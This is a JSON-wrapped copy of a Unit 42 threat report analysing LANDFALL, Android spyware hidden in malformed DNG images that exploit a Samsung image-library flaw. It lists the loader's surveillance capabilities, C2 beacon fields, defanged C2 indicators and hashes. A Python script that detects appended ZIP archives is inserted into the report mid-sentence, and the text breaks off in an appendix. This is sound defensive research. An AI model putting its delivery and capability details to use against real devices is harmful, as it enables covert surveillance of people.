{
	"id": "d509d1bb-45f0-4838-a070-a2a14324c581",
	"created_at": "2026-04-06T00:18:43.056767Z",
	"updated_at": "2026-04-10T03:30:46.177612Z",
	"deleted_at": null,
	"sha1_hash": "864f9d59af4b4b84b8ed7675fe8dd02a4ddd42a6",
	"title": "LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1628436,
	"plain_text": "LANDFALL: New Commercial-Grade Android Spyware in Exploit\r\nChain Targeting Samsung Devices\r\nBy Unit 42\r\nPublished: 2025-11-07 · Archived: 2026-04-05 21:24:51 UTC\r\nExecutive Summary\r\nUnit 42 researchers have uncovered a previously unknown Android spyware family, which we have named\r\nLANDFALL. To deliver the spyware, attackers exploited a zero-day vulnerability (CVE-2025-21042) in\r\nSamsung’s Android image processing library. The specific flaw LANDFALL exploited, CVE-2025-21042, is not\r\nan isolated case but rather part of a broader pattern of similar issues found on multiple mobile platforms.\r\nThis vulnerability was actively exploited in the wild before Samsung patched it in April 2025, following reports of\r\nin-the-wild attacks. However, the exploit itself — and the commercial-grade spyware used with it — have not yet\r\nbeen publicly reported and analyzed.\r\nLANDFALL was embedded in malicious image files (DNG file format) that appear to have been sent via\r\nWhatsApp. This method closely resembles an exploit chain involving Apple and WhatsApp that drew attention in\r\nAugust 2025. It also resembles an exploit chain that likely occurred using a similar zero-day vulnerability (CVE-2025-21043) disclosed in September. Our research did not identify any unknown vulnerabilities in WhatsApp.\r\nImportantly, our finding predates these disclosures — the LANDFALL campaign was already operating in mid-2024, using the zero-day Android/Samsung vulnerability (CVE-2025-21042) months before it was fixed.\r\nThe vulnerability has been patched since April 2025, so Samsung users running current firmware are not at ongoing risk from this exploit. 
In\r\nSeptember, Samsung also patched another zero-day vulnerability (CVE-2025-21043) in the same image\r\nprocessing library, further protecting against this type of attack.\r\nOur research looks back at historical exploitation that occurred before the patch, providing rare visibility into an\r\nadvanced spyware operation that was publicly unreported.\r\nKey findings:\r\nLANDFALL is Android spyware specifically designed to target Samsung Galaxy devices, used in targeted\r\nintrusion activities within the Middle East.\r\nLANDFALL enabled comprehensive surveillance, including microphone recording, location tracking and\r\ncollection of photos, contacts and call logs.\r\nThe spyware is delivered through malformed DNG image files exploiting CVE-2025-21042 — a critical\r\nzero-day vulnerability in Samsung’s image processing library, which was exploited in the wild.\r\nThe exploit chain possibly involved zero-click delivery using maliciously crafted images, similar to recent\r\nexploit chains seen on iOS and Samsung Galaxy.\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 1 of 23\n\nThe campaign shares infrastructure and tradecraft patterns with commercial spyware operations in the\r\nMiddle East, indicating possible links to private-sector offensive actors (PSOAs).\r\nLANDFALL remained active and undetected for months.\r\nPalo Alto Networks customers are better protected through the following products and services:\r\nAdvanced WildFire\r\nAdvanced URL Filtering\r\nAdvanced DNS Security\r\nAdvanced Threat Prevention\r\nIf you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response\r\nteam.\r\nLANDFALL Spyware Discovery\r\nIn mid-2025, following the public disclosure of an exploit chain targeting iOS devices, we searched for samples of\r\nthe iOS exploit. 
This led to our discovery of the Android spyware that we called LANDFALL.\r\nSpecifically, Unit 42 discovered several samples of DNG image files containing Android spyware used in an\r\nexploit chain targeting Samsung Galaxy devices. Our analysis confirmed these samples exploit CVE-2025-21042\r\nto deliver LANDFALL, possibly via zero-click exploits on messaging applications.\r\nBeginning the Hunt: The iOS Exploit Chain and How It Made Us Wonder\r\nIn August 2025, Apple issued OS security updates for its various products to address CVE-2025-43300, a zero-day vulnerability affecting DNG image parsing that attackers reportedly exploited in the wild.\r\nThat same month, WhatsApp disclosed CVE-2025-55177, a zero-day vulnerability in WhatsApp that was chained with the\r\nApple image-processing vulnerability in sophisticated attacks targeting iOS devices. The WhatsApp\r\nvulnerability allowed attackers to force devices to process content from arbitrary URLs.\r\nWhen the two vulnerabilities were combined in an exploit chain, this enabled zero-click remote code execution\r\nthrough maliciously crafted images sent via WhatsApp messages.\r\nGiven the disclosure of this in-the-wild exploit chain and the absence of publicly available exploit samples, we\r\ninitiated a hunt for this activity. Our search led to the discovery of several previously undetected DNG image files\r\ncontaining embedded Android spyware that were uploaded to VirusTotal throughout 2024 and early 2025.\r\nJudging by their filenames (e.g., WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg and IMG-20240723-WA0000.jpg), attackers likely delivered these samples via WhatsApp. 
Our analysis of the embedded spyware\r\nindicates it is designed for Samsung Galaxy devices.\r\nMalformed DNG Image Files: A New Attack Vector Trend\r\nOur analysis of LANDFALL spyware began with our discovery of malformed DNG image files. DNG stands for\r\nDigital Negative, and it is a raw image file format based on the TIFF image format. The malformed DNG image\r\nfiles we discovered have an embedded ZIP archive appended to the end of the file. Figure 1 shows one of these\r\nsamples in a hex editor, indicating where the ZIP archive content begins near the end of the file.\r\nFigure 1. Example of a malformed DNG image with an embedded ZIP archive.\r\nOur analysis indicates these DNG files exploit CVE-2025-21042, a vulnerability in Samsung's image-processing\r\nlibrary libimagecodec.quram.so that Samsung patched in April 2025. The exploit extracts shared object library\r\n(.so) files from the embedded ZIP archive to run LANDFALL spyware. Figure 2 below shows a flowchart for this\r\nspyware.\r\nFigure 2. 
Flowchart for LANDFALL spyware.\r\nTable 1 shows the DNG image samples we discovered.\r\nSHA256 hash | Filename | First seen\r\n9297888746158e38d320b05b27b0032b2cc29231be8990d87bc46f1e06456f93 | WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg | Feb. 10, 2025\r\nb06dec10e8ad0005ebb9da24204c96cb2e297bd8d418bc1c8983d066c0997756 | IMG-20250120-WA0005.jpg | Jan. 20, 2025\r\nc0f30c2a2d6f95b57128e78dc0b7180e69315057e62809de1926b75f86516b2e | WhatsApp Image 2024-08-27 at 11.48.40 AM.jpeg | Aug. 27, 2024\r\nb975b499baa3119ac5c2b3379306d4e50b9610e9bba3e56de7dfd3927a96032d | PHOTO-2024-08-27-11-48-41.jpg | Aug. 27, 2024\r\n29882a3c426273a7302e852aa77662e168b6d44dcebfca53757e29a9cdf02483 | IMG-20240723-WA0001.jpg | July 23, 2024\r\nb45817ffb0355badcc89f2d7d48eecf00ebdf2b966ac986514f9d971f6c57d18 | IMG-20240723-WA0000.jpg | July 23, 2024\r\nTable 1. DNG files with embedded malware.\r\nFilenames with strings like WhatsApp Image and WA000 imply attackers could have attempted to deliver the\r\nembedded Android spyware via WhatsApp. This matches earlier public reporting of similar DNG image-based\r\nexploitation through WhatsApp targeting Apple devices. Furthermore, WhatsApp researchers identified and\r\nreported a similar DNG vulnerability, CVE-2025-21043, to Samsung.\r\nDelivering LANDFALL Spyware: Mobile Device Malware Exploit Chains\r\nTypically, mobile device malware distributed through exploits requires a chain of exploits across different\r\nvulnerabilities for successful infection. 
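The appended-archive layout described in the Malformed DNG Image Files section (a ZIP archive following the TIFF/DNG data, as in Figure 1) can be triaged without parsing the image at all: a ZIP's end-of-central-directory record sits at the very end of the file and stores the central directory's offset relative to the start of the archive, so the position where the archive was glued onto the image falls out of simple arithmetic. The following Python is an added triage example written for this page, not code from Unit 42 or recovered from the samples; the file it scans is constructed inline (a minimal TIFF header plus a ZIP holding placeholder entries named b.so and l, as in Table 2), and the function names are ours.

```python
import io
import struct
import zipfile

# TIFF magics (little- and big-endian); DNG is a TIFF-based format.
TIFF_MAGICS = (bytes.fromhex('49492a00'), bytes.fromhex('4d4d002a'))
EOCD_SIG = bytes.fromhex('504b0506')   # ZIP end-of-central-directory record
CDIR_SIG = bytes.fromhex('504b0102')   # ZIP central-directory file header
EOCD_LEN = 22
CDIR_LEN = 46


def is_tiff_like(data: bytes) -> bool:
    return data[:4] in TIFF_MAGICS


def find_appended_zip(data: bytes):
    """Return (zip_start_offset, entry_names) if a ZIP archive ends at the
    tail of data, else None.  The archive may be preceded by arbitrary bytes
    (here: the DNG image), so the central-directory offset stored in the
    EOCD record is relative to the archive start, not to the file start."""
    tail = max(0, len(data) - (EOCD_LEN + 0xFFFF))  # EOCD comment is at most 65535 bytes
    eocd = data.rfind(EOCD_SIG, tail)
    if eocd < 0 or eocd + EOCD_LEN > len(data):
        return None
    # sig, disk, cd_disk, entries_this_disk, entries_total, cd_size, cd_offset, comment_len
    _, _, _, _, n_total, cd_size, cd_offset, _ = struct.unpack_from('<4s4HIIH', data, eocd)
    cd_abs = eocd - cd_size                 # central directory immediately precedes EOCD
    if cd_abs < 0 or data[cd_abs:cd_abs + 4] != CDIR_SIG:
        return None
    zip_start = cd_abs - cd_offset          # where the archive really begins in the file
    if zip_start < 0:
        return None
    names = []
    pos = cd_abs
    for _ in range(n_total):
        if data[pos:pos + 4] != CDIR_SIG:
            break
        fields = struct.unpack_from('<4s6HIII5HII', data, pos)
        fname_len, extra_len, comment_len = fields[10], fields[11], fields[12]
        names.append(data[pos + CDIR_LEN:pos + CDIR_LEN + fname_len].decode('utf-8', 'replace'))
        pos += CDIR_LEN + fname_len + extra_len + comment_len
    return zip_start, names


def scan(data: bytes) -> dict:
    """Verdict for one file: a TIFF/DNG with a ZIP archive glued on after the
    image data is the layout this page describes for the LANDFALL droppers."""
    result = {'tiff': is_tiff_like(data), 'appended_zip': None, 'suspicious': False}
    hit = find_appended_zip(data)
    if hit is not None:
        zip_start, names = hit
        result['appended_zip'] = {'offset': zip_start, 'entries': names}
        result['suspicious'] = result['tiff'] and zip_start > 0
    return result


def build_sample() -> bytes:
    """Constructed test input, not a real sample: an 8-byte TIFF header, one
    empty IFD, 64 bytes standing in for image data, then an appended ZIP whose
    entries carry only the names seen in the report (b.so, l) and a few bytes."""
    tiff = TIFF_MAGICS[0] + struct.pack('<I', 8) + struct.pack('<H', 0) + struct.pack('<I', 0)
    tiff += bytes(64)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.writestr('b.so', bytes.fromhex('7f454c46') + bytes(32))   # ELF magic + padding
        zf.writestr('l', bytes.fromhex('fd377a585a00') + bytes(16))  # XZ magic + padding
    return tiff + buf.getvalue()


if __name__ == '__main__':
    import sys
    paths = sys.argv[1:]
    for path in paths:
        with open(path, 'rb') as fh:
            print(path, scan(fh.read()))
    if not paths:
        print('constructed sample:', scan(build_sample()))
```

Run it over a directory of received images to list entry names and the offset at which the archive begins; a legitimate DNG never carries a central directory at its tail, so any hit on a file that also passes the TIFF magic check is worth pulling for analysis. The offset check (zip_start > 0) keeps plain ZIP files, which are not TIFFs, out of the suspicious bucket.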
Earlier research has documented chains of at least two vulnerabilities being used to\r\ndistribute spyware, but modern exploit chains for spyware are far more complex [PDF], linking multiple\r\nvulnerabilities to compromise mobile devices and gain privileges.\r\nWe have yet to discover any further exploits associated with this activity.\r\nPlease see the later section, How LANDFALL Fits Into the Larger Picture, for a more complete description of the\r\nknown vulnerabilities involved in this and similar exploit chains.\r\nLANDFALL Spyware Analysis\r\nLANDFALL is Android spyware specifically designed for Samsung Galaxy devices, likely used in targeted\r\nintrusion activities within the Middle East. This modular spyware is engineered for espionage and data\r\nexfiltration.\r\nThe infection chain for LANDFALL involves an exploit for CVE-2025-21042, a vulnerability in Samsung's\r\nimage-processing library tracked by the vendor as Samsung Vulnerabilities and Exposures (SVE) designator SVE-2024-1969. We believe a full attack chain would follow a pattern of potential zero-click remote code execution,\r\nbeginning with the delivery of the malformed DNG images.\r\nTwo components of LANDFALL spyware are embedded within the malformed DNG images and would be\r\nextracted and executed, following a successful exploit:\r\nLoader (b.so): An ARM64 ELF shared object (106 KB, stripped and dynamically linked) that serves as the\r\nmain backdoor.\r\nSELinux Policy Manipulator (l.so): An ELF binary decompressed from the XZ-compressed file l; this component is\r\ndesigned to manipulate the device's SELinux policy to grant LANDFALL elevated permissions and aid\r\npersistence. 
(See Appendix A - SELinux Policy Manipulation.)\r\nTable 2 shows the LANDFALL component files embedded within the malicious DNG samples.\r\nSHA256 hash | LANDFALL component | First seen\r\nffeeb0356abb56c5084756a5ab0a39002832403bca5290bb6d794d14b642ffe2 | b.so component | July 23, 2024\r\nd2fafc7100f33a11089e98b660a85bd479eab761b137cca83b1f6d19629dd3b0 | b.so component | Aug. 27, 2024\r\na62a2400bf93ed84ebadf22b441924f904d3fcda7d1507ba309a4b1801d44495 | b.so component | Jan. 23, 2025\r\n384f073d3d51e0f2e1586b6050af62de886ff448735d963dfc026580096d81bd | b.so component | Feb. 10, 2025\r\n211311468f3673f005031d5f77d4d716e80cbf3c1f0bb1f148f2200920513261 | XZ-compressed file (l) for the SELinux policy manipulator | July 23, 2024\r\n69cf56ac6f3888efa7a1306977f431fd1edb369a5fd4591ce37b72b7e01955ee | SELinux policy manipulator (l.so) extracted from the XZ-compressed file | July 23, 2024\r\nTable 2. LANDFALL components embedded in the DNG image files.\r\nOur analysis indicates LANDFALL is multi-component Android spyware designed for monitoring and data\r\nexfiltration.\r\nOur analysis focuses on the b.so component, which serves as the initial loader for a broader LANDFALL\r\nframework. In its own debug artifacts, the component refers to itself as “Bridge Head.” This will be of interest\r\nlater when we discuss possible relationships between LANDFALL and known spyware groups.\r\nLANDFALL’s Potential Capabilities\r\nThe b.so component of LANDFALL contains numerous debug and status strings, but it does not contain the logic\r\nthat actually references most of these strings. This suggests that b.so would download additional components for\r\nthese capabilities. 
Our analysis of embedded command strings and execution paths within the b.so file provides\r\ninsight into the broader LANDFALL framework's potential capabilities.\r\nDevice Fingerprinting\r\nOS version\r\nHardware ID (IMEI)\r\nSIM/Subscriber ID (IMSI)\r\nSIM card serial\r\nUser account\r\nVoicemail number\r\nNetwork configuration\r\nTaking inventory of installed applications\r\nAccessing location services\r\nVPN status\r\nUSB debugging status\r\nBluetooth\r\nData Exfiltration\r\nRecording microphone\r\nRecording calls\r\nCall history\r\nContacts database\r\nSMS/messaging data\r\nCamera photos\r\nArbitrary files\r\nDatabases on the device (browsing history, etc.)\r\nExecution, Loading and Persistence\r\nLoading native shared object (.so) modules\r\nLoading and executing DEX files from memory and disk\r\nInjecting processes\r\nExecuting via LD_PRELOAD\r\nExecuting arbitrary commands\r\nManipulating SELinux\r\nPersistence\r\nModifying SELinux policy via compressed binary\r\nMonitoring WhatsApp Media directory for additional payloads\r\nRegistering WhatsApp web client\r\nManipulating the file system in Android app directories\r\nManipulating the file system\r\nEvasion and Defense Avoidance\r\nDetecting a debugger via TracerPid\r\nDetecting the Frida instrumentation framework\r\nDetecting the Xposed framework\r\nDynamic library loading with namespace manipulation\r\nCertificate pinning for C2 communications\r\nCleaning up WhatsApp images payload\r\nTargeted Device Models\r\nGalaxy S23 Series (S91[168]BXX.*)\r\nGalaxy S24 Series (S921BXXU1AWM9, S92[168]BXX.*)\r\nGalaxy Z Fold4 (F936BXXS4DWJ1)\r\nGalaxy S22 (S901EXXS4CWD1)\r\nGalaxy Z Flip4 (F721BXXU1CWAC)\r\nFigure 3 shows an example of the targeted device model strings in a b.so sample of LANDFALL.\r\nFigure 3. 
LANDFALL b.so sample in a hexadecimal editor showing targeted device model\r\nnumbers.\r\nC2 Communication\r\nThe b.so component of LANDFALL communicates with its C2 server over HTTPS using a non-standard,\r\nephemeral TCP port. Before the HTTPS traffic, it can initiate ping traffic as detailed in the Communication With\r\nthe C2 Server section of Appendix B. For HTTPS traffic, b.so initiates contact with a POST request containing\r\ndetailed device and spyware information, such as:\r\nAgent ID\r\nDevice path\r\nUser ID\r\nFigure 4 shows an interpretation of this initial POST request, where we use curl to show how this request would\r\nbe structured. Of note, LANDFALL does not use curl to generate this traffic.\r\nFigure 4. HTTP POST request structure when b.so initially contacts the C2 server.\r\nThe initial beacon traffic is an HTTP POST request to the C2 server with the following parameters:\r\nprotocol: The protocol/variant tag (e.g., A1.5.0)\r\nprotocol_ver: The protocol version (observed as an empty string)\r\ntype: The message type (e.g., MSG_TYPE_GET_AGENT)\r\nagent_id: The agent's unique identifier\r\nupload_id: An upload identifier\r\ncommand_id: A command identifier\r\nsource: The source of the request (e.g., bridge_head)\r\nincremental_build: The incremental build version (e.g., v1.5.0)\r\neuid: The effective user ID of the process\r\nbh_path: The path to the b.so binary on the device\r\nrunner: The runner mode (e.g., I)\r\nConfiguration of b.so File\r\nThe b.so file's configuration is managed through a combination of hard-coded default values and an encrypted\r\nJSON object embedded within itself. This configuration includes C2 details, cryptographic keys and unique\r\nidentifiers for the agent and commands.\r\nFigure 5 shows an example of this configuration.\r\nFigure 5. 
Example of LANDFALL’s configuration.\r\nThis b.so component of LANDFALL also contains a number of hard-coded configuration values. These are used\r\nas default values if they are not provided in the encrypted JSON object. We do not yet fully understand the\r\npurpose of some of these values. Table 3 shows these hard-coded default configuration values.\r\nField name | Default value\r\nallow_wifi | true\r\nallow_mobile | true\r\nallow_roaming | false\r\nsocket_timeout | 5\r\nsleep_time | 60 (0x3c)\r\nsleep_time_between_retries | 35 (0x23)\r\nsuicide_time | 7200 (0x1c20)\r\nlive_mode_expiration | 0\r\nallow_min_battery | 0\r\nis_persistent | false\r\nTable 3. Hard-coded default configuration values for LANDFALL malware.\r\nC2 Infrastructure for LANDFALL Spyware\r\nBased on our analysis of these samples, we identified six C2 servers for LANDFALL, shown below in Table 4.\r\nIP address | Domain | First seen | Last seen\r\n194.76.224[.]127 | brightvideodesigns[.]com | Feb. 7, 2025 | Sept. 19, 2025\r\n91.132.92[.]35 | hotelsitereview[.]com | Feb. 3, 2025 | Sept. 16, 2025\r\n92.243.65[.]240 | healthyeatingontherun[.]com | Oct. 11, 2024 | Sept. 2, 2025\r\n192.36.57[.]56 | projectmanagerskills[.]com | Feb. 3, 2025 | Aug. 26, 2025\r\n46.246.28[.]75 | Unknown | Unknown | Unknown\r\n45.155.250[.]158 | Unknown | Unknown | Unknown\r\nTable 4. LANDFALL C2 servers.\r\nHow LANDFALL Fits Into the Larger Picture\r\nLANDFALL is one example of a larger pattern of exploit chains affecting mobile devices, related to DNG image\r\nprocessing vulnerabilities.\r\nThe LANDFALL campaign's use of a malformed DNG file highlights a significant, recurring attack vector: the\r\ntargeting of vulnerabilities within DNG image processing libraries. 
The specific flaw LANDFALL exploited,\r\nCVE-2025-21042, is not an isolated case but rather part of a broader pattern of similar issues found on multiple\r\nmobile platforms. In fact, in August 2025 WhatsApp reported another DNG flaw in the same Samsung library,\r\nCVE-2025-21043, to Samsung, and a parallel exploit chain on iOS was identified that leveraged CVE-2025-43300 in Apple\r\niOS and CVE-2025-55177 in WhatsApp.\r\nRelationship to CVE-2025-21043 (SVE-2025-1702)\r\nOur analysis revealed a possible connection to a separate vulnerability in the same library, CVE-2025-21043\r\n(SVE-2025-1702), which Samsung patched in its September 2025 security update. While it was not exploited in\r\nthe LANDFALL samples we discovered, the similarities between the exploit for LANDFALL (CVE-2025-21042)\r\nand this vulnerability (CVE-2025-21043) are striking. Both vulnerabilities were publicly disclosed around the\r\nsame time and both are connected to DNG image file processing delivered through mobile communication\r\napplications.\r\nApple's CVE-2025-43300\r\nIn August 2025, Apple addressed CVE-2025-43300, a zero-day vulnerability in DNG image parsing that was\r\nactively exploited in the wild to enable zero-click remote code execution through malicious images\r\nsent via mobile communication applications.\r\nWe cannot confirm whether this chain was used to deliver an equivalent of LANDFALL to iOS, or whether it is\r\nthe same threat actor behind the two. However, this parallel development in the iOS ecosystem, combined with the\r\ndisclosure of the Samsung and Apple vulnerabilities just a few weeks apart, highlights a broader pattern of DNG\r\nimage processing vulnerabilities being leveraged in sophisticated mobile spyware attacks.\r\nFigure 6. 
Timeline for recent malicious DNG image files and associated exploit activity.\r\nJuly 2024 – February 2025: Initial samples of malicious DNG image files carrying LANDFALL are first\r\nsubmitted on VirusTotal in July 2024, with additional samples appearing periodically over the next several\r\nmonths.\r\nThe DNG files exploit a vulnerability in Samsung’s Android image processing library (SVE-2024-1969, CVE-2025-21042).\r\nSept. 25, 2024: The vulnerability is privately reported to Samsung.\r\nApril 2025: Samsung issues a firmware update to address the vulnerability, SVE-2024-1969, later known\r\nas CVE-2025-21042 when publicly disclosed.\r\nAugust 2025: Parallel developments occur.\r\nApple patches a zero-day vulnerability impacting DNG image parsing, which was actively exploited\r\nin the wild (CVE-2025-43300).\r\nWhatsApp discloses a vulnerability (CVE-2025-55177) that was chained with Apple’s DNG image\r\nparsing zero-day vulnerability (CVE-2025-43300).\r\nWe discovered DNG image files exploiting CVE-2025-21042 to deliver Android spyware that we\r\nidentified as LANDFALL.\r\nWhatsApp disclosed to Samsung CVE-2025-21043 — another DNG-related zero-day vulnerability\r\nin Samsung Galaxy devices.\r\nSeptember 2025: Samsung issues mobile device firmware updates for CVE-2025-21043 (SVE-2025-1702). 
Concurrently, it assigns CVE-2025-21042 (SVE-2024-1969) to the earlier vulnerability that\r\npreviously had no CVE designator.\r\nPotential Victims\r\nAnalysis of VirusTotal submission data for the malicious DNG files indicates potential targets in Iraq, Iran, Turkey\r\nand Morocco.\r\nTurkey's national CERT (in Turkish, USOM) reported IP addresses used by LANDFALL's C2 servers as\r\nmalicious, mobile- and APT-related, which also supports the possible targeting of victims in Turkey.\r\nRelationship to Known Spyware Groups\r\nWhile we were unable to recover every component of the LANDFALL framework, it is clear that the tool is\r\ncommercial grade. It may have utilized several zero-day exploits in its infection chain.\r\nSuch tools are often developed and sold as commercial spyware and attributed to groups known as private sector\r\noffensive actors (PSOAs), who are often legitimate legal entities. Reportedly, these groups provide services to\r\ngovernment entities.\r\nWe were not able at this time to officially attribute LANDFALL activity to a known PSOA or threat actor. Unit 42\r\ntracks the activity related to CVE-2025-21042 and LANDFALL as CL-UNK-1054.\r\nTwo aspects are notable and worth highlighting.\r\nFirst, LANDFALL's C2 infrastructure and domain registration patterns share similarities to infrastructure\r\nassociated with Stealth Falcon as observed by Unit 42. These similarities are based on various public reports, as\r\nwell as Stealth Falcon activity we have analyzed for targets in the Middle East.\r\nSecond, in its own debug artifacts, the spyware component we analyzed refers to itself as “Bridge Head.” Of note,\r\nthe term Bridge Head is a common nickname used by some private-sector offensive cyber companies (including\r\nNSO, Variston [PDF], Cytrox and Quadream) for first-stage loaders. 
However, this naming convention alone does\r\nnot constitute a direct attribution link.\r\nWhile this is a common name used in commercial mobile spyware to describe loaders, it draws similarities to the\r\nHeliconia framework. This framework also contains references to “BridgeHead,” as Google TAG reported about\r\nspyware vendor Variston. Google identified Variston as a Barcelona-based PSOA (provider of exploits). Further\r\nanalysis from Google and other reports indicated Variston's tooling was supplied to clients in the UAE through a\r\nreseller named Protect Electronic Systems (or Protected AE).\r\nThis potential provider-client link to the UAE is noteworthy, as Microsoft and others reported that Stealth Falcon\r\nalso operates heavily out of that country. Variston reportedly ceased operations in early 2025 following its public\r\nexposure.\r\nAs of October 2025, apart from the infrastructure similarities noted above, we have not observed direct overlaps between the mobile campaigns\r\nof LANDFALL and the endpoint-based activity from Stealth Falcon, nor direct strong links with Stealth Falcon.\r\nHowever, the similarities are worth discussion.\r\nConclusion\r\nThe discovery of LANDFALL spyware reveals a campaign targeting Samsung Android devices. The exploit chain\r\ninvolves CVE-2025-21042, a vulnerability that was patched by Samsung in April 2025. The presence of this\r\nspyware within DNG image files with WhatsApp-related naming conventions likely indicates attackers attempted\r\nto deliver the exploit through a messaging application.\r\nFrom the initial appearance of samples in July 2024, this activity highlights how sophisticated exploits can remain\r\nin public repositories for an extended period before being fully understood.\r\nThe analysis of the loader reveals evidence of commercial-grade activity. 
The LANDFALL spyware components\r\nsuggest advanced capabilities for stealth, persistence and comprehensive data collection from modern Samsung\r\ndevices.\r\nHowever, we have not directly analyzed the next-stage components of the spyware. Additional details on this or\r\non the exact delivery method would provide even more insight into the malicious activity.\r\nPalo Alto Networks customers are better protected from LANDFALL Android spyware through the following\r\nproducts:\r\nThe Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated\r\nin light of the indicators shared in this research.\r\nAdvanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with\r\nthis activity as malicious.\r\nAdvanced Threat Prevention has an inbuilt machine learning-based detection that can detect exploits in real\r\ntime.\r\nIf you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)\r\nUK: +44.20.3743.3660\r\nEurope and Middle East: +31.20.299.3130\r\nAsia: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nAustralia: +61.2.4062.7950\r\nIndia: 000 800 050 45107\r\nPalo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA\r\nmembers use this intelligence to rapidly deploy protections to their customers and to systematically disrupt\r\nmalicious cyber actors. 
Learn more about the Cyber Threat Alliance.\r\nIndicators of Compromise\r\nMalware Samples\r\nMalware samples for LANDFALL activity are listed below in Table 7.\r\nSHA256 hash | Filename | Size\r\nb06dec10e8ad0005ebb9da24204c96cb2e297bd8d418bc1c8983d066c0997756 | img-20250120-wa0005.jpg | 6.66 MB\r\nc0f30c2a2d6f95b57128e78dc0b7180e69315057e62809de1926b75f86516b2e | 2.tiff | 6.58 MB\r\n9297888746158e38d320b05b27b0032b2cc29231be8990d87bc46f1e06456f93 | whatsapp image 2025-02-10 at 4.54.17 pm.jpeg | 6.66 MB\r\nd2fafc7100f33a11089e98b660a85bd479eab761b137cca83b1f6d19629dd3b0 | b.so | 103.31 KB\r\n384f073d3d51e0f2e1586b6050af62de886ff448735d963dfc026580096d81bd | (none listed) | 103.31 KB\r\nb975b499baa3119ac5c2b3379306d4e50b9610e9bba3e56de7dfd3927a96032d | 1.jpeg | 5.66 MB\r\na62a2400bf93ed84ebadf22b441924f904d3fcda7d1507ba309a4b1801d44495 | (none listed) | 103.31 KB\r\n29882a3c426273a7302e852aa77662e168b6d44dcebfca53757e29a9cdf02483 | img-20240723-wa0001.jpg | 6.58 MB\r\n2425f15eb542fca82892fd107ac19d63d4d112ddbfe698650f0c25acf6f8d78a | 6357fc.zip | 380.71 KB\r\nb45817ffb0355badcc89f2d7d48eecf00ebdf2b966ac986514f9d971f6c57d18 | img-20240723-wa0000.jpg | 5.65 MB\r\n69cf56ac6f3888efa7a1306977f431fd1edb369a5fd4591ce37b72b7e01955ee | localfile~ | 1.42 MB\r\n211311468f3673f005031d5f77d4d716e80cbf3c1f0bb1f148f2200920513261 | l | 332.88 KB\r\nffeeb0356abb56c5084756a5ab0a39002832403bca5290bb6d794d14b642ffe2 | (none listed) | 103.31 KB\r\nTable 7. 
Malware samples for LANDFALL activity.\r\nIP Addresses\r\n45.155.250[.]158\r\n46.246.28[.]75\r\n91.132.92[.]35\r\n92.243.65[.]240\r\n192.36.57[.]56\r\n194.76.224[.]127\r\nDomain Names\r\nbrightvideodesigns[.]com\r\nhealthyeatingontherun[.]com\r\nhotelsitereview[.]com\r\nprojectmanagerskills[.]com\r\nAdditional Resources\r\nCISA Adds One Known Exploited Vulnerability to Catalog – Alert, CISA\r\nNVD - CVE-2025-21042 – NIST\r\nNVD - CVE-2025-43300 – NIST\r\nNVD - CVE-2025-55177 – NIST\r\nSamsung Mobile Security Updates – Samsung\r\nWhatsApp Security Advisories 2025 – WhatsApp\r\nStealth Falcon's Exploit of Microsoft Zero Day Vulnerability – Check Point Research\r\nStealth Falcon preying over Middle Eastern skies with Deadglyph – ESET\r\nBuying Spying [PDF] – Google TAG\r\nNew details on commercial spyware vendor Variston – Google TAG\r\nIP address entry for 91.132.92[.]35 – Turkish National CERT (USOM)\r\nCVE-2025-21043 Analysis: When DNG Opcodes Become Attack Vectors – Blog, Matt Suiche\r\nELEGANT BOUNCER Detection Framework – Matt Suiche, GitHub\r\nAppendices\r\nAppendix A: SELinux Policy Manipulation\r\nLANDFALL's component for SELinux policy manipulation is l.so. This file provides a capability to bypass\r\nsystem security controls. 
It is decompressed from /data/data/com.samsung.ipservice/files/l to\r\n/data/data/com.samsung.ipservice/files/l.so and executed.\r\nRather than containing hard-coded rules, l.so implements a generic engine that can dynamically parse and load\r\nnew SELinux policy statements from an external source, modifying the running policy in memory.\r\nRelevant and unique exported functions:\r\nsepolicy_from_data: Load policy from binary data\r\nsepolicy_add_statement: Add individual policy statements\r\nsepolicy_to_buffer: Serialize modified policy\r\nsepolicy_delete: Clean up policy objects\r\nAppendix B: Additional Details on LANDFALL Spyware Analysis\r\nThis appendix details the observed capabilities of the loader component of LANDFALL, as well as those we infer\r\nexist in other modules of the complete LANDFALL framework that we have not yet accessed.\r\nLANDFALL’s Bridge Head, named on the disk as b.so, is loaded by an exploit on the device. Immediately after\r\nbeing loaded post‑exploit, LANDFALL parses LD_PRELOAD from the environment to avoid inheriting upstream\r\npreloads. It reads the effective user ID via geteuid() and stores it globally so later branches can adjust behavior for\r\nroot versus non‑root. Then it calls into the main routine.\r\nIt gathers process basics (parent pid, euid, Android build string), reads a runner flag from the environment variable\r\nR and takes a copy of it for later actions. This value (typically I for interactive or P for passive) is reported to\r\nthe command-and-control server and determines how it launches a later staged payload. It resolves its own mapped path,\r\nselects the app-private base at /data/data/com.samsung.ipservice/files/ as its working directory and then constructs\r\ntwo child paths there. 
